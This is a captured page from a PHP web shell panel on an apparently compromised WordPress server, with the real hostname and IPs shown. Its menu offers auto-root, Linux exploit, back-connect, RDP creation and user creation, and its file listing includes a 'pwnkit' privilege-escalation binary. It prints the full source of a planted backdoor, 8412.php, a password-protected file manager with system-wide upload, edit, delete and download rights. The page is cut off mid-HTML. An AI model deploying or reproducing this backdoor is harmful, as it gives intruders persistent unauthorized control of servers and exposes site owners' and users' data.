Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.tmb
[ DIR ]
drwxrwxrwx
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
360assessment
[ DIR ]
drwxr-xr-x
?;
academy
[ DIR ]
drwxr-x---
?;
cgi-bin
[ DIR ]
drwxr-xr-x
?;
demo
[ DIR ]
drwxr-x---
?;
files
[ DIR ]
drwxr-xr-x
?;
hp
[ DIR ]
drwxr-xr-x
?;
hpalearning
[ DIR ]
drwxr-x---
?;
new
[ DIR ]
drwxr-xr-x
?;
pts
[ DIR ]
drwxr-x---
?;
resources
[ DIR ]
drwxr-xr-x
?;
sat
[ DIR ]
drwxr-x---
?;
spruu
[ DIR ]
drwxr-xr-x
?;
talent-acquisition
[ DIR ]
drwxr-x---
?;
thelearnzone
[ DIR ]
drwxr-x---
?;
webinar
[ DIR ]
drwxr-x---
?;
wordpress
[ DIR ]
drwxr-xr-x
?;
wp-admin
[ DIR ]
drwxr-xr-x
?;
wp-content
[ DIR ]
drwxr-xr-x
?;
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
289
B
-rw-r--r--
.index.php
1.46
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
8412.php
44.96
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
117.58
KB
-rw-r--r--
index.php
1.27
KB
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
robots.txt
1.12
KB
-rw-r--r--
wordpress-6.9.4.zip
27.36
MB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config.php
3.57
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.88
KB
-rw-r--r--
wp-login.php
50.23
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 8412.php
<?php /** * PHP File Manager — Brutalist Edition * Single-file implementation with authentication and security features * Version: 4.0 */ define('FM_PASSWORD', 'bela'); define('FM_SESSION_TIMEOUT', 3600); define('FM_ROOT_PATH', dirname(__FILE__)); define('FM_SHOW_HIDDEN', false); define('FM_ALLOWED_EXTENSIONS', 'txt,php,html,css,js,json,xml,htaccess,md,log,sql,csv,ini,conf,yml,yaml,hpp,cpp,c,h,py,sh,bat'); define('FM_MAX_UPLOAD_SIZE_MB', 50); define('FM_ALLOW_SYSTEM_WIDE', true); class SecurityHelper { public static function generateCSRFToken() { if (empty($_SESSION['csrf_token'])) $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); return $_SESSION['csrf_token']; } public static function validateCSRFToken($token) { return isset($_SESSION['csrf_token']) && hash_equals($_SESSION['csrf_token'], $token); } public static function sanitizePath($path) { $path = str_replace(['../', '..\\'], '', $path); return preg_replace('#/+#', '/', $path); } public static function isPathAllowed($path) { if (!FM_ALLOW_SYSTEM_WIDE) { $rootPath = realpath(FM_ROOT_PATH); $checkPath = realpath($path); if ($checkPath === false || strpos($checkPath, $rootPath) !== 0) return false; } return true; } public static function setSecurityHeaders() { header('X-Frame-Options: SAMEORIGIN'); header('X-Content-Type-Options: nosniff'); header('X-XSS-Protection: 1; mode=block'); } } class FileManagerAuth { public static function startSession() { if (session_status() === PHP_SESSION_NONE) { ini_set('session.cookie_httponly', 1); ini_set('session.use_only_cookies', 1); session_start(); } if (isset($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] > FM_SESSION_TIMEOUT)) { self::logout(); return false; } $_SESSION['last_activity'] = time(); return true; } public static function isAuthenticated() { return isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true; } public static function login($password) { if ($password === FM_PASSWORD) { $_SESSION['authenticated'] = true; $_SESSION['login_time'] = time(); $_SESSION['last_activity'] = time(); return true; } return false; } public static function logout() { session_unset(); session_destroy(); } } function formatSize($bytes) { $units = ['B','KB','MB','GB','TB']; $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= (1 << (10 * $pow)); return round($bytes, 2) . $units[$pow]; } function getFileExt($filename) { $ext = strtoupper(pathinfo($filename, PATHINFO_EXTENSION)); return $ext ?: '—'; } function isEditableFile($filename) { $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); return in_array($ext, explode(',', FM_ALLOWED_EXTENSIONS)); } function getUserDirectories() { $dirs = []; if (is_dir('/home') && is_readable('/home')) { $scan = @scandir('/home'); if ($scan) foreach ($scan as $item) if ($item !== '.' && $item !== '..' && is_dir('/home/' . $item)) $dirs[] = '/home/' . $item; } return $dirs; } SecurityHelper::setSecurityHeaders(); FileManagerAuth::startSession(); if (isset($_GET['logout'])) { FileManagerAuth::logout(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } /* ── LOGIN ─────────────────────────────────────────────────── */ if (!FileManagerAuth::isAuthenticated()) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { if (FileManagerAuth::login($_POST['password'])) { header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $loginError = true; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>FM // AUTH</title> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@300;400;600;700;900&family=IBM+Plex+Mono:wght@400;500&display=swap" rel="stylesheet"> <style> *,*::before,*::after{margin:0;padding:0;box-sizing:border-box} :root { --black: #0A0A0A; --white: #F0EDE8; --yellow: #E8FF00; --grey1: #1A1A1A; --grey2: #2A2A2A; --grey3: #444; --grey4: #888; } body { font-family: 'Barlow Condensed', sans-serif; background: var(--black); color: var(--white); min-height: 100vh; display: grid; place-items: center; overflow: hidden; position: relative; } /* Grid texture overlay */ body::before { content: ''; position: fixed; inset: 0; background-image: linear-gradient(var(--grey1) 1px, transparent 1px), linear-gradient(90deg, var(--grey1) 1px, transparent 1px); background-size: 60px 60px; opacity: 0.5; pointer-events: none; } /* Big background text */ .bg-text { position: fixed; font-size: 28vw; font-weight: 900; color: var(--grey1); letter-spacing: -0.05em; line-height: 1; top: 50%; left: 50%; transform: translate(-50%, -50%); user-select: none; pointer-events: none; white-space: nowrap; } .wrap { position: relative; z-index: 10; width: 480px; } .tag-line { font-size: 11px; letter-spacing: 5px; text-transform: uppercase; color: var(--yellow); margin-bottom: 6px; font-weight: 400; } h1 { font-size: 72px; font-weight: 900; line-height: 0.9; letter-spacing: -0.02em; color: var(--white); margin-bottom: 40px; text-transform: uppercase; } h1 span { display: block; color: var(--yellow); } .panel { border: 2px solid var(--grey3); background: var(--grey1); padding: 32px; } .panel-header { border-bottom: 1px solid var(--grey3); margin: -32px -32px 28px; padding: 12px 32px; display: flex; align-items: center; justify-content: space-between; background: var(--grey2); } .panel-header span { font-size: 11px; letter-spacing: 3px; text-transform: uppercase; color: var(--grey4); } .dot-row { display: flex; gap: 6px; } .dot { width: 10px; height: 10px; border: 1px solid var(--grey3); } .dot.y { background: var(--yellow); border-color: var(--yellow); } .error-bar { background: var(--yellow); color: var(--black); padding: 10px 16px; font-size: 13px; font-weight: 700; letter-spacing: 2px; text-transform: uppercase; margin-bottom: 20px; display: flex; align-items: center; gap: 10px; } .error-bar::before { content: '!'; font-size: 16px; } label { display: block; font-size: 11px; letter-spacing: 3px; text-transform: uppercase; color: var(--grey4); margin-bottom: 8px; } input[type="password"] { width: 100%; padding: 14px 16px; background: var(--black); border: 2px solid var(--grey3); color: var(--yellow); font-family: 'IBM Plex Mono', monospace; font-size: 18px; letter-spacing: 4px; outline: none; margin-bottom: 20px; transition: border-color 0.15s; } input[type="password"]:focus { border-color: var(--yellow); } input[type="password"]::placeholder { color: var(--grey3); letter-spacing: 2px; font-size: 14px; } button[type="submit"] { width: 100%; padding: 16px; background: var(--yellow); color: var(--black); border: none; font-family: 'Barlow Condensed', sans-serif; font-size: 20px; font-weight: 900; letter-spacing: 4px; text-transform: uppercase; cursor: pointer; transition: all 0.1s; position: relative; } button[type="submit"]:hover { background: var(--white); transform: translate(-2px,-2px); box-shadow: 4px 4px 0 var(--yellow); } button[type="submit"]:active { transform: translate(0,0); box-shadow: none; } </style> </head> <body> <div class="bg-text">FM</div> <div class="wrap"> <div class="tag-line">// System Access Required</div> <h1>File<span>Mgr.</span></h1> <div class="panel"> <div class="panel-header"> <span>Authentication</span> <div class="dot-row"> <div class="dot"></div> <div class="dot"></div> <div class="dot y"></div> </div> </div> <?php if (isset($loginError)): ?> <div class="error-bar">Access Denied — Invalid Password</div> <?php endif; ?> <form method="POST"> <label>Password</label> <input type="password" name="password" placeholder="enter key" required autofocus> <button type="submit">Authenticate →</button> </form> </div> </div> </body> </html> <?php exit; } /* ── AUTHENTICATED LOGIC ────────────────────────────────────── */ $currentPath = FM_ROOT_PATH; $message = ''; $messageType = ''; if (isset($_GET['path'])) { $rp = SecurityHelper::sanitizePath($_GET['path']); $checkPath = ($rp !== '' && $rp[0] === '/') ? $rp : FM_ROOT_PATH . '/' . $rp; if (is_dir($checkPath) && SecurityHelper::isPathAllowed($checkPath)) $currentPath = realpath($checkPath); } if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!isset($_POST['csrf_token']) || !SecurityHelper::validateCSRFToken($_POST['csrf_token'])) { $message = 'Security token mismatch.'; $messageType = 'error'; } else { if (isset($_FILES['upload_file'])) { $up = $currentPath . '/' . basename($_FILES['upload_file']['name']); $mx = FM_MAX_UPLOAD_SIZE_MB * 1024 * 1024; if ($_FILES['upload_file']['size'] > $mx) { $message = 'File exceeds size limit.'; $messageType = 'error'; } elseif (move_uploaded_file($_FILES['upload_file']['tmp_name'], $up)) { $message = 'File uploaded successfully.'; $messageType = 'success'; } else { $message = 'Upload failed.'; $messageType = 'error'; } } if (isset($_POST['create_folder'])) { $nf = $currentPath . '/' . basename($_POST['folder_name']); if (!is_dir($nf) && mkdir($nf, 0755)) { $message = 'Folder created.'; $messageType = 'success'; } else { $message = 'Could not create folder.'; $messageType = 'error'; } } if (isset($_POST['create_file'])) { $nf = $currentPath . '/' . basename($_POST['file_name']); if (file_put_contents($nf, '') !== false) { $message = 'File created.'; $messageType = 'success'; } else { $message = 'Could not create file.'; $messageType = 'error'; } } if (isset($_POST['rename_item'])) { $old = $currentPath . '/' . basename($_POST['old_name']); $new = $currentPath . '/' . basename($_POST['new_name']); if (rename($old, $new)) { $message = 'Renamed successfully.'; $messageType = 'success'; } else { $message = 'Rename failed.'; $messageType = 'error'; } } if (isset($_POST['delete_item'])) { $ip = $currentPath . '/' . basename($_POST['item_name']); function deleteDirectory($dir) { if (!is_dir($dir)) return unlink($dir); foreach (array_diff(scandir($dir), ['.','..']) as $item) { $p = $dir.'/'.$item; is_dir($p) ? deleteDirectory($p) : unlink($p); } return rmdir($dir); } if (deleteDirectory($ip)) { $message = 'Deleted.'; $messageType = 'success'; } else { $message = 'Delete failed.'; $messageType = 'error'; } } if (isset($_POST['save_file'])) { $fp = SecurityHelper::sanitizePath($_POST['file_path']); if (file_put_contents($fp, $_POST['file_content']) !== false) { $message = 'File saved.'; $messageType = 'success'; } else { $message = 'Save failed.'; $messageType = 'error'; } } } } if (isset($_GET['download'])) { $df = $currentPath . '/' . basename($_GET['download']); if (file_exists($df) && is_file($df)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($df) . '"'); header('Content-Length: ' . filesize($df)); readfile($df); exit; } } /* ── EDITOR ─────────────────────────────────────────────────── */ if (isset($_GET['edit'])) { $ef = $currentPath . '/' . basename($_GET['edit']); if (file_exists($ef) && is_file($ef) && isEditableFile($ef)) { $fc = file_get_contents($ef); $fsize = formatSize(filesize($ef)); $fmod = date('D, d M Y H:i', filemtime($ef)); $fext = strtoupper(pathinfo($ef, PATHINFO_EXTENSION)); $backUrl = htmlspecialchars($_SERVER['PHP_SELF'] . '?path=' . urlencode(dirname($ef))); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>EDIT // <?php echo htmlspecialchars(basename($ef)); ?></title> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;900&family=IBM+Plex+Mono:wght@400;500&display=swap" rel="stylesheet"> <style> *,*::before,*::after{margin:0;padding:0;box-sizing:border-box} :root{ --black:#0A0A0A;--white:#F0EDE8;--yellow:#E8FF00; --g1:#1A1A1A;--g2:#2A2A2A;--g3:#333;--g4:#555;--g5:#888; } html,body{height:100%;overflow:hidden;} body{font-family:'Barlow Condensed',sans-serif;background:var(--black);color:var(--white);display:flex;flex-direction:column;} .top-bar{ background:var(--g1); border-bottom:2px solid var(--g3); padding:0 20px; height:50px; display:flex; align-items:center; gap:16px; flex-shrink:0; } .back-link{ display:inline-flex;align-items:center;gap:6px; color:var(--g5);text-decoration:none; font-size:12px;letter-spacing:2px;text-transform:uppercase; padding:6px 12px;border:1px solid var(--g3); transition:all .1s; } .back-link:hover{color:var(--yellow);border-color:var(--yellow);} .file-title{ font-size:20px;font-weight:700;letter-spacing:1px;color:var(--white); text-transform:uppercase; } .file-meta{ font-family:'IBM Plex Mono',monospace;font-size:11px;color:var(--g5); margin-left:auto;display:flex;gap:20px; } .meta-item{display:flex;flex-direction:column;align-items:flex-end;} .meta-item .label{font-size:9px;letter-spacing:2px;text-transform:uppercase;color:var(--g4);margin-bottom:1px;} .save-btn{ padding:10px 24px;background:var(--yellow);color:var(--black); border:none;font-family:'Barlow Condensed',sans-serif; font-size:15px;font-weight:900;letter-spacing:3px;text-transform:uppercase; cursor:pointer;transition:all .1s;flex-shrink:0; } .save-btn:hover{background:var(--white);transform:translate(-1px,-1px);box-shadow:3px 3px 0 var(--yellow);} .save-btn:active{transform:none;box-shadow:none;} .editor-shell{flex:1;display:flex;overflow:hidden;} .gutter{ background:var(--g1); border-right:1px solid var(--g3); padding:14px 14px; font-family:'IBM Plex Mono',monospace;font-size:12px; color:var(--g4);text-align:right; min-width:54px;overflow:hidden;white-space:pre; line-height:1.65;user-select:none; counter-reset:line; } textarea{ flex:1;padding:14px 18px; background:var(--black);border:none; font-family:'IBM Plex Mono',monospace;font-size:13px; line-height:1.65;color:var(--white); resize:none;outline:none;tab-size:4; caret-color:var(--yellow); } textarea::selection{background:rgba(232,255,0,0.2);} .status-bar{ background:var(--g1);border-top:1px solid var(--g3); padding:5px 20px;display:flex;gap:24px;align-items:center;flex-shrink:0; } .status-item{ font-size:10px;letter-spacing:2px;text-transform:uppercase; color:var(--g5);display:flex;align-items:center;gap:6px; } .status-item strong{color:var(--yellow);} </style> </head> <body> <form method="POST" action="<?php echo $backUrl; ?>" style="display:flex;flex-direction:column;height:100%;overflow:hidden;"> <input type="hidden" name="csrf_token" value="<?php echo SecurityHelper::generateCSRFToken(); ?>"> <input type="hidden" name="file_path" value="<?php echo htmlspecialchars($ef); ?>"> <div class="top-bar"> <a href="<?php echo $backUrl; ?>" class="back-link">← Back</a> <div class="file-title"><?php echo htmlspecialchars(basename($ef)); ?></div> <div class="file-meta"> <div class="meta-item"><span class="label">Type</span><?php echo $fext; ?></div> <div class="meta-item"><span class="label">Size</span><?php echo $fsize; ?></div> <div class="meta-item"><span class="label">Modified</span><?php echo $fmod; ?></div> </div> <button type="submit" name="save_file" class="save-btn">Save →</button> </div> <div class="editor-shell"> <div class="gutter" id="gutter">1</div> <textarea name="file_content" id="ed" spellcheck="false" oninput="upd(this)" onscroll="document.getElementById('gutter').scrollTop=this.scrollTop"><?php echo htmlspecialchars($fc); ?></textarea> </div> <div class="status-bar"> <div class="status-item">Lines <strong id="lc">1</strong></div> <div class="status-item">Cursor <strong id="cp">1:1</strong></div> <div class="status-item">Encoding <strong>UTF-8</strong></div> <div class="status-item">Path <strong><?php echo htmlspecialchars($ef); ?></strong></div> </div> </form> <script> const ed=document.getElementById('ed'),g=document.getElementById('gutter'); function upd(){ const n=ed.value.split('\n').length; g.textContent=Array.from({length:n},(_,i)=>i+1).join('\n'); document.getElementById('lc').textContent=n; } ed.addEventListener('keyup',()=>{ const l=ed.value.substring(0,ed.selectionStart).split('\n'); document.getElementById('cp').textContent=`${l.length}:${l[l.length-1].length+1}`; }); ed.addEventListener('keydown',e=>{ if(e.key==='Tab'){e.preventDefault();const s=ed.selectionStart;ed.value=ed.value.substring(0,s)+' '+ed.value.substring(ed.selectionEnd);ed.selectionStart=ed.selectionEnd=s+4;upd();} }); upd(); </script> </body> </html> <?php exit; } } /* ── DIRECTORY SCAN ─────────────────────────────────────────── */ $items = []; if (is_readable($currentPath)) { foreach (scandir($currentPath) as $item) { if ($item === '.' || (!FM_SHOW_HIDDEN && $item[0] === '.' && $item !== '..')) continue; $ip = $currentPath . '/' . $item; $isDir = is_dir($ip); $items[] = [ 'name' => $item, 'is_dir'=> $isDir, 'size' => $isDir ? '—' : formatSize(filesize($ip)), 'bytes' => $isDir ? 0 : filesize($ip), 'date' => date('Y-m-d', filemtime($ip)), 'time' => date('H:i', filemtime($ip)), 'perms' => substr(sprintf('%o', fileperms($ip)), -4), 'ext' => $isDir ? 'DIR' : getFileExt($item), ]; } usort($items, fn($a,$b)=>$b['is_dir']<=>$a['is_dir']?:strcmp($a['name'],$b['name'])); } // Breadcrumb $parts = array_filter(explode('/', str_replace('\\','/',$currentPath))); $bc = []; $cp2 = ''; foreach ($parts as $p) { $cp2 .= '/'.$p; $bc[] = ['name'=>$p,'path'=>$cp2]; } $userDirs = getUserDirectories(); $csrf = SecurityHelper::generateCSRFToken(); $totalFiles = count(array_filter($items, fn($i)=>!$i['is_dir'])); $totalDirs = count(array_filter($items, fn($i)=>$i['is_dir'])); $sessionAge = gmdate('H:i:s', time() - $_SESSION['login_time']); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>FM // <?php echo htmlspecialchars(basename($currentPath)?:'/'); ?></title> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,600;0,700;0,900;1,400&family=IBM+Plex+Mono:wght@400;500&display=swap" rel="stylesheet"> <style> *,*::before,*::after{margin:0;padding:0;box-sizing:border-box;} :root{ --black:#0A0A0A; --off-white:#F0EDE8; --yellow:#E8FF00; --g1:#141414; --g2:#1E1E1E; --g3:#2A2A2A; --g4:#3A3A3A; --g5:#555; --g6:#888; --g7:#AAA; --border:1px solid #2A2A2A; --border-y:1px solid var(--yellow); } html,body{height:100%;overflow:hidden;} body{ font-family:'Barlow Condensed',sans-serif; background:var(--black); color:var(--off-white); display:flex;flex-direction:column; } /* ── GLOBAL TOP STRIP ── */ .global-bar{ background:var(--yellow); color:var(--black); padding:6px 24px; display:flex;align-items:center;gap:16px; font-size:11px;font-weight:700;letter-spacing:3px;text-transform:uppercase; flex-shrink:0; } .global-bar .brand{ font-size:14px;font-weight:900;letter-spacing:2px; } .global-bar .spacer{ flex:1; } .global-bar a{ color:var(--black);text-decoration:none;opacity:0.6;transition:opacity .15s; } .global-bar a:hover{ opacity:1; } .global-bar .sep{ opacity:0.3; } /* ── LAYOUT ── */ .layout{ display:flex;flex:1;overflow:hidden; } /* ── SIDEBAR ── */ .sidebar{ width:240px;min-width:240px; background:var(--g1); border-right:var(--border); display:flex;flex-direction:column; overflow:hidden; } .sb-head{ padding:20px 20px 16px; border-bottom:var(--border); } .sb-label{ font-size:9px;letter-spacing:3px;text-transform:uppercase; color:var(--g6);margin-bottom:10px; } .sb-path{ font-family:'IBM Plex Mono',monospace; font-size:11px;color:var(--g7); word-break:break-all;line-height:1.5; } .sb-path strong{color:var(--yellow);} .sb-counters{ display:flex;gap:0;margin-top:14px; } .sb-counter{ flex:1;padding:8px 10px; background:var(--g2);border:var(--border); text-align:center; } .sb-counter:first-child{border-right:none;} .sb-counter .num{ font-size:24px;font-weight:900;color:var(--yellow);line-height:1; } .sb-counter .lbl{ font-size:9px;letter-spacing:2px;text-transform:uppercase;color:var(--g6);margin-top:2px; } .sb-nav{ flex:1;overflow-y:auto;padding:12px 0; } .sb-nav::-webkit-scrollbar{width:3px;} .sb-nav::-webkit-scrollbar-thumb{background:var(--g4);} .sb-section-label{ padding:10px 20px 4px; font-size:9px;letter-spacing:3px;text-transform:uppercase;color:var(--g5); } .sb-item{ display:flex;align-items:center;gap:10px; padding:9px 20px; color:var(--g6);font-size:14px;letter-spacing:0.5px; text-decoration:none; border-left:2px solid transparent; transition:all .1s; background:none;border-top:none;border-right:none;border-bottom:none; width:100%;font-family:'Barlow Condensed',sans-serif; cursor:pointer;text-align:left; text-transform:uppercase;font-weight:600; } .sb-item:hover{ color:var(--off-white);background:var(--g2);border-left-color:var(--g4); } .sb-item.active{ color:var(--yellow);background:rgba(232,255,0,0.05);border-left-color:var(--yellow); } .sb-item .itype{ font-family:'IBM Plex Mono',monospace; font-size:9px;letter-spacing:1px;color:var(--g5); margin-left:auto; } .sb-item.active .itype{ color:rgba(232,255,0,0.4); } /* ── MAIN ── */ .main{ flex:1;display:flex;flex-direction:column;overflow:hidden;min-width:0; } /* ── NAV BAR ── */ .nav-bar{ background:var(--g1);border-bottom:var(--border); padding:0 24px;height:48px; display:flex;align-items:center;gap:12px;flex-shrink:0; } .breadcrumb{ flex:1;display:flex;align-items:center;gap:0; overflow:hidden;min-width:0; } .breadcrumb a{ color:var(--g6);text-decoration:none; font-size:13px;letter-spacing:1px;text-transform:uppercase;font-weight:600; padding:3px 6px; transition:color .1s;white-space:nowrap; } .breadcrumb a:hover{ color:var(--yellow); } .breadcrumb a:last-child{ color:var(--off-white); } .breadcrumb .bsep{ color:var(--g4);padding:0 3px;font-size:16px; } .path-form{ display:flex;gap:0; } .path-form input{ padding:8px 14px;background:var(--black);border:1px solid var(--g4); border-right:none;color:var(--off-white); font-family:'IBM Plex Mono',monospace;font-size:12px; outline:none;width:260px;transition:border-color .15s; } .path-form input:focus{ border-color:var(--yellow); } .path-form button{ padding:8px 16px;background:var(--g3);border:1px solid var(--g4); color:var(--off-white);font-family:'Barlow Condensed',sans-serif; font-size:13px;font-weight:700;letter-spacing:2px;text-transform:uppercase; cursor:pointer;transition:all .1s; } .path-form button:hover{ background:var(--yellow);color:var(--black);border-color:var(--yellow); } /* ── ACTION BAR ── */ .action-bar{ background:var(--g2);border-bottom:var(--border); padding:10px 24px;display:flex;align-items:center;gap:8px;flex-shrink:0; } .act{ display:inline-flex;align-items:center;gap:6px; padding:8px 16px; border:1px solid var(--g4);background:transparent; color:var(--g7); font-family:'Barlow Condensed',sans-serif; font-size:13px;font-weight:700;letter-spacing:2px;text-transform:uppercase; cursor:pointer;text-decoration:none; transition:all .1s; } .act:hover{ border-color:var(--yellow);color:var(--yellow);background:rgba(232,255,0,0.05); } .act.primary{ background:var(--yellow);color:var(--black);border-color:var(--yellow); } .act.primary:hover{ background:var(--off-white);border-color:var(--off-white);transform:translate(-2px,-2px);box-shadow:3px 3px 0 var(--yellow); } /* ── FLASH MESSAGE ── */ .flash{ margin:12px 24px 0;padding:10px 16px; font-size:13px;font-weight:700;letter-spacing:2px;text-transform:uppercase; display:flex;align-items:center;gap:10px;flex-shrink:0; } .flash.success{ background:rgba(232,255,0,0.1);border:1px solid rgba(232,255,0,0.4);color:var(--yellow); } .flash.error{ background:rgba(255,80,60,0.1);border:1px solid rgba(255,80,60,0.4);color:#FF5040; } /* ── FILE LIST ── */ .file-area{ flex:1;overflow-y:auto;padding:16px 24px 24px; } .file-area::-webkit-scrollbar{width:6px;} .file-area::-webkit-scrollbar-thumb{background:var(--g4);} .file-table{ width:100%;border-collapse:collapse; border:var(--border); background:var(--g1); } .file-table th{ padding:10px 16px;text-align:left; font-size:9px;letter-spacing:3px;text-transform:uppercase; color:var(--g5);background:var(--g2); border-bottom:2px solid var(--g3); font-weight:600;position:sticky;top:0;z-index:5; } .file-table th:first-child{ border-left:2px solid var(--yellow); } .file-table tbody tr{ border-bottom:var(--border); transition:background .08s; } .file-table tbody tr:hover{ background:var(--g2); } .file-table td{ padding:9px 16px;vertical-align:middle; } .ext-tag{ display:inline-block; padding:2px 6px; background:var(--g3);border:1px solid var(--g4); font-family:'IBM Plex Mono',monospace; font-size:9px;font-weight:500;letter-spacing:1px; color:var(--g6); min-width:34px;text-align:center; } .ext-tag.is-dir{ background:rgba(232,255,0,0.1);border-color:rgba(232,255,0,0.3);color:var(--yellow); } .name-cell{ display:flex;align-items:center;gap:10px; } .fname{ font-size:14px;letter-spacing:0.5px;color:var(--off-white); } .fname a{ color:inherit;text-decoration:none;transition:color .1s; } .fname a:hover{ color:var(--yellow); } .fname a.isdir{ color:var(--yellow);font-style:italic; } .fname a.isdir:hover{ color:var(--off-white); } td.size{ font-family:'IBM Plex Mono',monospace;font-size:11px;color:var(--g6); } td.date{ font-family:'IBM Plex Mono',monospace;font-size:11px;color:var(--g6); } td.date .t{ color:var(--g5);font-size:10px; } td.perm{ font-family:'IBM Plex Mono',monospace;font-size:11px;color:var(--g4); } .row-acts{ display:flex;gap:4px; opacity:0;transition:opacity .1s; } tr:hover .row-acts{ opacity:1; } .ract{ padding:4px 10px; border:1px solid var(--g4);background:transparent; color:var(--g6); font-family:'Barlow Condensed',sans-serif; font-size:12px;font-weight:700;letter-spacing:1.5px;text-transform:uppercase; cursor:pointer;text-decoration:none; display:inline-flex;align-items:center; transition:all .1s; } .ract:hover{ transform:translate(-1px,-1px);box-shadow:2px 2px 0; } .ract-edit:hover{ color:var(--yellow);border-color:var(--yellow);box-shadow-color:var(--yellow);background:rgba(232,255,0,0.05); } .ract-dl:hover{ color:#40E080;border-color:#40E080;box-shadow:2px 2px 0 #40E080;background:rgba(64,224,128,0.05); } .ract-ren:hover{ color:#80A0FF;border-color:#80A0FF;box-shadow:2px 2px 0 #80A0FF;background:rgba(128,160,255,0.05); } .ract-del:hover{ color:#FF5040;border-color:#FF5040;box-shadow:2px 2px 0 #FF5040;background:rgba(255,80,64,0.05); } .empty{ text-align:center;padding:80px; color:var(--g4); } .empty .e-label{ font-size:64px;font-weight:900;letter-spacing:-2px; color:var(--g2);margin-bottom:12px; } .empty p{ font-size:14px;letter-spacing:2px;text-transform:uppercase; } /* ── MODALS ── */ .backdrop{ display:none;position:fixed;inset:0; background:rgba(0,0,0,0.85); z-index:1000;align-items:center;justify-content:center; } .backdrop.open{ display:flex; } .modal{ background:var(--g1); border:1px solid var(--g4); width:420px;max-width:92vw; animation:mIn .15s ease both; } @keyframes mIn{ from{opacity:0;transform:scale(0.95) translateY(-10px);} to{opacity:1;transform:scale(1) translateY(0);} } .modal-head{ background:var(--g2); border-bottom:1px solid var(--g3); padding:16px 24px; display:flex;align-items:center;justify-content:space-between; } .modal-head h3{ font-size:18px;font-weight:900;letter-spacing:2px; text-transform:uppercase;color:var(--yellow); } .modal-head .close-btn{ background:none;border:none;color:var(--g5); font-size:20px;cursor:pointer;padding:0 4px; transition:color .1s;font-family:'Barlow Condensed',sans-serif; font-weight:900; } .modal-head .close-btn:hover{ color:var(--off-white); } .modal-body{ padding:24px; } .m-label{ display:block;font-size:10px;letter-spacing:3px; text-transform:uppercase;color:var(--g6);margin-bottom:8px; } .m-input{ width:100%;padding:12px 14px; background:var(--black); border:1px solid var(--g4); color:var(--off-white); font-family:'IBM Plex Mono',monospace;font-size:14px; outline:none;transition:border-color .15s;margin-bottom:20px; } .m-input:focus{ border-color:var(--yellow); } .m-actions{ display:flex;gap:8px; } .m-btn{ padding:11px 24px; font-family:'Barlow Condensed',sans-serif; font-size:15px;font-weight:900;letter-spacing:2px; text-transform:uppercase;cursor:pointer;border:1px solid; transition:all .1s; } .m-btn-ok{ background:var(--yellow);color:var(--black);border-color:var(--yellow); } .m-btn-ok:hover{ background:var(--off-white);border-color:var(--off-white);transform:translate(-2px,-2px);box-shadow:3px 3px 0 var(--yellow); } .m-btn-del{ background:rgba(255,80,64,0.1);color:#FF5040;border-color:#FF5040; } .m-btn-del:hover{ background:rgba(255,80,64,0.2); } .m-btn-cancel{ background:transparent;color:var(--g6);border-color:var(--g4); } .m-btn-cancel:hover{ border-color:var(--g6);color:var(--off-white); } .del-msg{ background:rgba(255,80,64,0.08); border:1px solid rgba(255,80,64,0.3); padding:14px 16px; font-size:14px;color:var(--g7);line-height:1.6; margin-bottom:20px; } .del-msg strong{ color:#FF5040; } </style> </head> <body> <!-- GLOBAL TOP STRIP --> <div class="global-bar"> <span class="brand">// FILE MANAGER</span> <span class="sep">|</span> <span><?php echo htmlspecialchars(get_current_user()); ?></span> <span class="sep">|</span> <span>SESSION <?php echo $sessionAge; ?></span> <span class="spacer"></span> <a href="?logout">LOGOUT</a> </div> <div class="layout"> <!-- SIDEBAR --> <aside class="sidebar"> <div 